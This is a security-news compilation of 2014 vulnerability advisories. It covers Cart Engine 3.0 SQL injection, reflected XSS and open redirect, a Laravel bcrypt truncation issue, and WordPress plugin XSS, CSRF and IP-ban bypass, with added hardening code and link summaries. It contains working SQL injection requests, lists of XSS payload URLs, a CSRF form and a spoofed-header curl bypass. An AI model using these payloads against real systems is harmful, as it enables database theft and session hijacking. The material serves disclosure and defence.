Channel: BOT24

[Quantum Leap Advisory] #QLA140808 Cart Engine 3.0 Multiple vulnerabilities - SQL Injection, XSS Reflected, Open Redirect

=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0

=== Executive Summary ===

SQL Injection: A specially crafted HTTP request exploits missing validation[1]
of the "item_id[0]" and "item_id[]" input parameters of the cart.php page.
Successful exploitation lets an attacker read sensitive data from the database
and, depending on the database account's privileges and configuration, perform
administrative operations on the database or issue commands to the operating
system.

Reflected XSS: A specially crafted HTTP request exploits missing output
neutralization[2] on multiple pages that echo user-submitted content.
Successful exploitation results in the execution of arbitrary HTML and script
code in the victim's browser, in the context of the victim's session, through a
reflected XSS.

Open Redirect: A specially crafted HTTP request can redirect[3] a user's
browsing to a malicious site, because index.php, cart.php, msg.php and page.php
redirect to the untrusted URL supplied in the Referer HTTP header. Successful
exploitation enables phishing, credential theft and malware distribution.

=== Proof of Concept ===

= SQL Injection (based on MySQL) =

A SQL injection vulnerability has been detected in the cart.php page of Cart
Engine CMS. The "sql_query" call in "cart.php" does not sanitize the "$item_id"
parameter, so error-based, boolean-based blind and time-based blind SQL
injection attacks can be executed. The two requests below use the error-based
technique: the COUNT(*) ... GROUP BY ... FLOOR(RAND()*2) subquery is built to
raise a MySQL duplicate-entry error whose message contains the result of user()
(first request) and database() (second request), and that error text is
returned in the response.


## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774

-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"

add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"

8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##

## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353

-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"

add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"

13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"

3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"

' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##
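The pattern the advisory describes (user input concatenated into the query inside cart.php) next to a hardened replacement, as an added example that is not Cart Engine's code. Table and column names (ce_items, item_id, price), the function names and the PDO setup are assumptions; what the example shows is how the array-valued item_id[] field from the requests above can be validated and bound through a prepared statement so that neither payload reaches MySQL as SQL.

```php
<?php
// Added example, not Cart Engine code. Table/column names are assumptions.

/**
 * Normalise the item_id form field, which the requests above send both as
 * item_id[0] and as item_id[], into a list of distinct positive integers.
 * Anything that is not purely digits is dropped, so a value such as
 * "8' AND (SELECT 22 FROM ..." never reaches the query at all.
 */
function normalise_item_ids($raw)
{
    $ids = [];
    foreach ((array) $raw as $value) {
        if (is_string($value) && preg_match('/^[1-9][0-9]{0,9}\z/', $value)) {
            $ids[] = (int) $value;
        }
    }
    return array_values(array_unique($ids));
}

/**
 * Hardened lookup: the number of placeholders is derived from the validated
 * list, so the SQL text itself never contains user-supplied bytes.
 */
function fetch_cart_items(PDO $db, array $raw_item_ids)
{
    $ids = normalise_item_ids($raw_item_ids);
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare(
        "SELECT item_id, price FROM ce_items WHERE item_id IN ($placeholders)"
    );
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/**
 * The vulnerable shape the advisory describes, shown only for contrast:
 * each item_id is interpolated into the query string, so a single quote in
 * the value ends the literal and the rest is executed as SQL.
 */
function fetch_cart_items_vulnerable(PDO $db, array $raw_item_ids)
{
    $rows = [];
    foreach ($raw_item_ids as $item_id) {
        $result = $db->query(
            "SELECT item_id, price FROM ce_items WHERE item_id = '$item_id'"
        );
        $rows = array_merge($rows, $result->fetchAll(PDO::FETCH_ASSOC));
    }
    return $rows;
}

// Usage (assumed DSN/credentials):
// $db = new PDO('mysql:host=127.0.0.1;dbname=cartengine;charset=utf8mb4', $user, $pass, [
//     PDO::ATTR_EMULATE_PREPARES => false,          // bind server-side
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
// $items = fetch_cart_items($db, isset($_POST['item_id']) ? $_POST['item_id'] : []);
```

Two further checks matter for this particular PoC. The error-based payload only reveals user() and database() because MySQL's error text reaches the HTTP response, so display_errors should be off and database exceptions logged rather than printed. Disabling emulated prepares is defence in depth: with emulation on, PDO quotes the values client-side, which still defeats this payload but is not what the MySQL server is asked to parse.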

= Reflected XSS =

A reflected XSS vulnerability has been detected on multiple pages of Cart
Engine CMS. In the template "skins/default/outline.tpl", the "path" value in the
"drop down TOP menu (with path)" section and "$print_this_page" in the
"footer_content_block" section are emitted without output encoding, so every
page that renders the template reflects the payload. The two payload shapes
below correspond to two output contexts: "><script>...</script> closes an HTML
attribute and its tag, and ';alert('XSS')// closes a JavaScript string literal
and comments out the remainder of the statement.

## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##
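Context-specific encoding for the two reflection points named above, as an added example that is not Cart Engine's template code. $print_this_page and $path are the variable names the advisory gives; that both are derived from the request URI, and the exact markup they land in, are assumptions chosen to match the two payload shapes.

```php
<?php
// Added example, not Cart Engine code. Markup and variable derivation are assumptions.

/** For values placed inside a quoted HTML attribute (or text content). */
function html_attr($value)
{
    // Encodes < > & " ' so the value can neither end the attribute nor the tag.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** For values placed inside an inline <script> block as a JS string literal. */
function js_string($value)
{
    // json_encode yields a complete, quoted JS string literal. The HEX flags
    // turn < > & ' " into \uXXXX escapes, so neither a quote nor a literal
    // </script> can break out of the script block; non-ASCII (including the
    // line terminators U+2028/2029) is \u-escaped by default.
    return json_encode((string) $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_SLASHES);
}

/**
 * A stand-in for the two template sections: the footer's "print this page"
 * link (attribute context) and the top menu's path variable (JS context).
 */
function render_footer_and_menu($request_uri)
{
    $print_this_page = $request_uri;
    $path            = $request_uri;
    return
        '<a href="' . html_attr($print_this_page) . '&print=1">Print this page</a>' . "\n" .
        '<script>var menuPath = ' . js_string($path) . ';</script>' . "\n";
}

// Constructed inputs mirroring the advisory's two payload shapes.
$attacks = [
    '/index.php?"><script>alert(\'XSS\')</script>',
    "/index.php?';alert('XSS')//",
];
foreach ($attacks as $uri) {
    echo render_footer_and_menu($uri);
}
```

The fix belongs at the output point in outline.tpl, once per context, rather than in a single "sanitize" pass over the request: the same string needs different encoding in the href attribute and in the script block, and encoding for one context does not protect the other.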

= Open Redirect =

An open redirect vulnerability has been detected on multiple pages of Cart
Engine CMS. The function "redir" in "includes/function.php" sends the browser to
"$_SERVER['HTTP_REFERER']" without checking it, so any Referer value is copied
verbatim into the Location header, as the request and response below show.
Because the Referer is set by the browser rather than by the link itself, an
attacker exploits this by linking to an affected page from a site they control:
the shop then answers with a 302 back to the attacker's URL.

## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close


$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

 sent 403, rcvd 380
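A replacement for the redir() behaviour described above, as an added example that is not Cart Engine's code: the Referer is followed only when it resolves to the shop's own host, and otherwise a fixed site-relative fallback is used. The function names, the SITE_HOST constant and the /index.php fallback are assumptions.

```php
<?php
// Added example, not Cart Engine code. Names and the fallback are assumptions.

// The canonical host of the shop. Assumption: this comes from configuration,
// deliberately not from the Host header, which the client also controls.
const SITE_HOST = 'eshop.hacme.hac';

/**
 * Decide where a "go back" redirect may point. Returns a site-relative
 * path, never a foreign absolute URL, so the Location header cannot be used
 * to bounce users off-site.
 */
function safe_referer_target($referer, $own_host, $fallback = '/index.php')
{
    if (!is_string($referer) || $referer === '') {
        return $fallback;
    }
    $parts = parse_url($referer);
    if ($parts === false) {
        return $fallback;
    }
    $scheme = strtolower(isset($parts['scheme']) ? $parts['scheme'] : '');
    $host   = strtolower(isset($parts['host']) ? $parts['host'] : '');
    // Only http(s), only our host, and no userinfo: rejects
    // http://www.google.com/..., //evil.example/..., and
    // http://eshop.hacme.hac@evil.example/ (whose host is evil.example).
    if (!in_array($scheme, ['http', 'https'], true)
        || $host !== strtolower($own_host)
        || isset($parts['user']) || isset($parts['pass'])) {
        return $fallback;
    }
    // Rebuild from parsed components rather than echoing the raw header.
    $path = isset($parts['path']) ? $parts['path'] : '/';
    if ($path === '' || $path[0] !== '/') {
        $path = '/' . $path;
    }
    $query = isset($parts['query']) ? '?' . $parts['query'] : '';
    return $path . $query;
}

/** Drop-in for the vulnerable redir(): same intent, checked destination. */
function redir_safe()
{
    $target = safe_referer_target(
        isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : null,
        SITE_HOST
    );
    // header() itself refuses values containing CR/LF, so a Referer carrying
    // newlines cannot inject a second header here.
    header('Location: ' . $target, true, 302);
    exit;
}

// Constructed inputs: the advisory's Referer and a legitimate same-site one.
foreach ([
    'http://www.google.com/search?hl=en&q=',
    'http://eshop.hacme.hac/detail.php?item_id=8',
    'http://eshop.hacme.hac@evil.example/',
] as $ref) {
    printf("%-45s -> %s\n", $ref, safe_referer_target($ref, SITE_HOST));
}
```

Returning a site-relative path is the simplest way to guarantee the user stays on the shop's origin; if the application genuinely needs to send users to other hosts, the target should come from an allow-list keyed by an identifier, not from any client-supplied URL.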

=== Solution ===

Upgrade to Cart Engine 4.0.

=== Disclosure Timeline ===

2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory

=== References ===

[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

Laravel 2.1 Hash::make() bcrypt truncation

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# Laravel 2.1 Hash::make() bcrypt truncation
# Website : http://laravel.com/
# Author : @u0x (Pichaya Morimoto)
# Release dates : September 16, 2014
#
# Special Thanks to 2600 Thailand group
https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Laravel
============================================================
Laravel is a free, open source PHP web application framework, designed for
the development of model–view–controller (MVC) web applications. According
to a December 2013 developers survey on PHP frameworks popularity, Laravel
is listed as the most popular PHP framework in 2013. At the same time, as
of August 2014 Laravel is the most popular and watched PHP project on
GitHub.
https://en.wikipedia.org/wiki/Laravel

[+] Description
============================================================
Laravel's documented password storage mechanism,
http://laravel.com/docs/security#storing-passwords
hashes passwords with Laravel's Hash::make() function. This function internally
calls PHP's password_hash() without checking the length of its input.

Why does length matter? As the PHP manual says,
"Using the PASSWORD_BCRYPT for the algo parameter,
will result in the password parameter being truncated
to a maximum length of 72 characters."
http://php.net/manual/en/function.password-hash.php
The limit is in fact 72 bytes, so a password of fewer than 72 characters that
contains multibyte UTF-8 can be cut short as well.

If a user chooses a password longer than 72 bytes, only the first 72 bytes take
part in the hash. Any two passwords that share the same first 72 bytes therefore
produce interchangeable hashes, and either one (or the 72-byte prefix alone)
passes Hash::check() against the other's hash.

This is not a collision in the cryptographic sense but silent truncation: the
characters beyond 72 bytes add no security, contrary to what a user expects of a
long passphrase.

[+] Proof-of-Concept
============================================================
// user input password: 72 "A" characters
$input = str_repeat('A', 72);
// plaintext passwords that share those 72 characters as a prefix
$pass1 = str_repeat('A', 72) . 'mysupersecretpassword';
$pass2 = str_repeat('A', 72) . 'longcatishere';
// hashed passwords
$hash1 = Hash::make($pass1);
$hash2 = Hash::make($pass2);
// does the 72-character prefix verify against each hash?
$status1 = Hash::check($input, $hash1) ? 'Yes' : 'No';
$status2 = Hash::check($input, $hash2) ? 'Yes' : 'No';

User 1
  $input                        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  $pass1                        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmysupersecretpassword
  Hash::make($pass1)            $2y$10$9oMcpTwHgTzR5ZUMqlnMMOx/P18QZ5e9054lq.pwxw1O9urX3JHHu
  Hash::check($input, $hash1)   Yes

User 2
  $input                        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  $pass2                        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlongcatishere
  Hash::make($pass2)            $2y$10$W7wwB4nLmFjrenJGmx1uauqhjzikZNZA0qzxH8wkbiSmVatCYrAUm
  Hash::check($input, $hash2)   Yes

[+] Vulnerable Code
============================================================
/vendor/laravel/framework/src/Illuminate/Hashing/BcryptHasher.php

...
public function make($value, array $options = array())
{
...
$hash = password_hash($value, PASSWORD_BCRYPT, array('cost' => $cost));
...
return $hash;

[+] How to fix this?
============================================================
The Django project solved the same problem by applying SHA-256 before bcrypt:
"BCryptSHA256PasswordHasher fixes this by first hashing the password using
sha256. This prevents the password truncation"
https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-bcrypt-with-django

Two things have to be right when adopting this in Laravel: the pre-hash must be
applied identically in make() and check(), and hashes created before the change
will no longer verify through the new check(), so they must be rehashed on each
user's next successful login. The simpler alternative is to reject passwords
longer than 72 bytes at the validation layer, so the truncation can never occur
silently.
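The Django approach carried over to PHP, as an added example that is not Laravel's or Django's code: the password is reduced to a SHA-256 hex digest before bcrypt, so every byte of a long passphrase influences the stored hash. The class and method names are assumptions; in a Laravel application this logic would be registered as a custom hasher rather than called directly. The bottom of the block replays the advisory's PoC against both the pre-hashed and the plain password_hash() path.

```php
<?php
// Added example, not Laravel or Django code. Names are assumptions.

final class Sha256BcryptHasher
{
    /** @var int bcrypt work factor */
    private $cost;

    public function __construct($cost = 10)
    {
        $this->cost = (int) $cost;
    }

    /**
     * 64 hexadecimal characters, always below bcrypt's 72-byte limit.
     * Hex output (not raw digest bytes) is deliberate: bcrypt treats its
     * input as a C string and stops at the first NUL byte, which a raw
     * SHA-256 digest may contain.
     */
    private function prehash($password)
    {
        return hash('sha256', (string) $password);
    }

    public function make($password)
    {
        return password_hash($this->prehash($password), PASSWORD_BCRYPT, ['cost' => $this->cost]);
    }

    public function check($password, $hash)
    {
        return password_verify($this->prehash($password), $hash);
    }

    /** True when $hash was made with another cost and should be regenerated. */
    public function needsRehash($hash)
    {
        return password_needs_rehash($hash, PASSWORD_BCRYPT, ['cost' => $this->cost]);
    }
}

// Replaying the advisory's PoC against both approaches.
$input = str_repeat('A', 72);                              // what the attacker types
$pass1 = str_repeat('A', 72) . 'mysupersecretpassword';    // what the user registered

$fixed   = new Sha256BcryptHasher(10);
$withFix = $fixed->check($input, $fixed->make($pass1));    // suffix now takes part in the hash

$plain = password_hash($pass1, PASSWORD_BCRYPT, ['cost' => 10]);
$noFix = password_verify($input, $plain);                  // bcrypt only ever saw the first 72 bytes

var_dump($withFix, $noFix);
```

Migration is the part that is easy to get wrong: a bcrypt string does not record whether the input was pre-hashed, so an application adopting this needs a per-user flag (or a distinct prefix) to tell old hashes from new ones, verify old hashes with the old path, and rehash on the next successful login. Pre-hashing also removes the 72-byte ceiling without removing the need for a sensible maximum length on the submitted password, since the server still computes SHA-256 over whatever is sent.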



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Microsoft Windows 8.1 Kernel Patch Protection Analysis & Attack Vectors

Kernel Patch Protection (also known as "patchguard") is a Windows mechanism designed to
control the integrity of vital code and data structures used by the operating system. It was
introduced in Windows 2003 x64 and has been constantly improved in further Windows
versions. In this article we present a descriptive analysis of the patchguard for the latest
Windows 8.1 x64 OS, and primarily focus on patchguard initialization and attack vectors related
to it.

more here..........http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html

Pirates of the Internetz: The curse of the waterhole

Last week the Bromium Labs team was contacted by a Fortune 1000 customer that detected an interesting attack via one of their installed LAVA sensors. We get such events frequently from our customers; however this attack was a bit different. The attack was a classic waterhole attack targeting potential viewers of a technology startup in the Oil and Gas sector. Interestingly, this attack occurred days after the company announced a sizable funding grant. It’s likely that the attackers were expecting more traffic to the website and hoped to increase their chances of a successful infection.

more here............http://labs.bromium.com/2014/09/16/pirates-of-the-internetz-the-curse-of-the-waterhole/

Paper: The Dark Alleys of Madison Avenue: Understanding Malicious Advertisements

Online advertising drives the economy of the World Wide Web. Modern websites of any size and popularity include advertisements to monetize visits from their users. To this end, they assign an area of their web page to an advertising company (so called ad exchange) that will use it to display promotional content. By doing this, the website owner implicitly trusts that the advertising company will offer legitimate content and it will not put the site's visitors at risk of falling victims of malware campaigns and other scams.

In this paper, we perform the first large-scale study of the safety of the advertisements that are encountered by the users on the Web. In particular, we analyze to what extent users are exposed to malicious content through advertisements, and investigate what are the sources of this malicious content. Additionally, we show that some ad exchanges are more prone to serving malicious advertisements than others, probably due to their deficient filtering mechanisms. The observations that we make in this paper shed light on a little studied, yet important, aspect of advertisement networks, and can help both advertisement networks and website owners in securing their web pages and in keeping their visitors safe.


more here...........http://www.ei.rub.de/media/emma/veroeffentlichungen/2014/09/02/paper.pdf

SpyFiles 4 -WikiLeaks publicly disclosed copies of FinFisher surveillance software

Today, 15 September 2014, WikiLeaks releases previously unseen copies of weaponised German surveillance malware used by intelligence agencies around the world to spy on journalists, political dissidents and others.

FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices. FinFisher first came to public attention in December 2011 when WikiLeaks published documents detailing their products and business in the first SpyFiles release.

more here.............https://wikileaks.org/spyfiles4/


Reflected XSS in WooCommerce – excelling eCommerce allows attackers ability to do almost anything an admin user can do (WordPress plugin)

Details
================
Software: WooCommerce - excelling eCommerce
Version: 2.1.12
Homepage: http://wordpress.org/plugins/woocommerce/
Advisory report: https://security.dxw.com/advisories/reflected-xss-in-woocommerce-excelling-ecommerce-allows-attackers-ability-to-do-almost-anything-an-admin-user-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
Reflected XSS in WooCommerce – excelling eCommerce allows attackers ability to do almost anything an admin user can do

Vulnerability
================
An attacker able to convince a logged-in admin user to visit a link of their choosing (for instance via spearphishing) can execute arbitrary JavaScript within the admin’s browser which could cause it to delete all posts, create new admin users, or leverage other functionality accessible only to admins.

Proof of concept
================
If a logged-in administrator visits the following URL, a JavaScript alert will display in the admin screen:
http://localhost/wp-admin/admin.php?page=wc-reports&range=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Note that this will not work in a browser with reflected XSS prevention (e.g. Google Chrome)

Mitigations
================
Upgrade to version 2.2.3 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-08-28: Discovered
2014-09-15: Reported to Vendor by email
2014-09-15: Requested CVE
2014-09-16: Vendor responded
2014-09-16: Fixed version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

CSRF/XSS vulnerability in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do (WordPress plugin)

Details
================
Software: Login Widget With Shortcode
Version: 3.1.1
Homepage: http://wordpress.org/plugins/login-sidebar-widget/
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
CSRF/XSS vulnerability in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do

Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page.  Using that ability they can use JavaScript to control an admin user’s browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.

Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=login_widget_afo">
  <input type="text" name="custom_style_afo" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="option" value="login_widget_afo_save_settings">
  <input type="submit">
</form>

Mitigations
================
Upgrade to version 3.2.1 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-08-26: Discovered
2014-09-15: Reported to vendor by email
2014-09-15: Vendor reported the issue fixed and a new version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

SiteKiosk - Breakout

It has been a while since my last blog post, therefore I am going to share two possible bypasses for the software SiteKiosk on Windows. As the name suggests, it is a kiosk software ^^.
SiteKiosk is a software from Provision GmbH. It claims to have more than 250,000 installations worldwide, which would make it one of the most used products in the "Public Access Terminal Software" category.
It has a lot of features, but my only goal was to break out of the sandbox and start an external application.
In the end my findings produced new BeEF modules.

more here............http://insert-script.blogspot.co.at/2014/09/sitekiosk-breakout.html

[TECHNICAL TEAR DOWN] FIESTA EXPLOIT KIT – JAVA EXPLOIT (CVE-2012-0507)

Today, we’re going to look at another exploit that is delivered by the Fiesta Exploit Kit. As usual, the purpose of this post is to provide a technical understanding on how the exploit work. This time it is a JAVA exploit.

more here................http://www.vxsecurity.sg/2014/09/17/technical-tear-down-fiesta-exploit-kit-java-exploit-cve-2012-0507/

Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations (WordPress plugin)

Details
================
Software: WP-Ban
Version: 1.62
Homepage: http://wordpress.org/plugins/wp-ban/
Advisory report: https://security.dxw.com/advisories/vulnerability-in-wp-ban-allows-visitors-to-bypass-the-ip-blacklist-in-some-configurations/
CVE: CVE-2014-6230
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations

Vulnerability
================
This plugin allows blacklisting users based on their IP address, however it takes the IP address from the X-Forwarded-For header if available.
Not all Web server configurations will strip or replace X-Forwarded-For headers – in which case the IP ban can be bypassed by sending this header. This plugin therefore only works in certain configurations, but does not warn admins of this fact.

Proof of concept
================

Visit http://localhost/wp-admin/admin.php?page=wp-ban/ban-options.php
Set "Banned IPs" to "127.0.0.1"
Execute curl http://localhost/ and see the "You Are Banned" message
Execute curl http://localhost/ -H 'X-Forwarded-For: 999.999.999.999' and see that it displays the page

Note that this will not work if your Web server sets or strips X-Forwarded-For headers.
(To remove the IP blacklist run this SQL: delete from wp_options where option_name='banned_ips';)

Mitigations
================
Upgrade to version 1.6.4 or later.
If a reverse-proxy is used, check the “I am using a reverse proxy” box in the plugin settings, and ensure that X-Forwarded-For headers are being set even if the request already contains an X-Forwarded-For header.
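The rule the mitigation above implies, as an added example that is not WP-Ban's code: trust X-Forwarded-For only when the request arrived through one of your own reverse proxies, and then use the right-most address that a trusted proxy did not itself add. The proxy address 10.0.0.5, the function names and the three request arrays are constructed for the example.

```php
<?php
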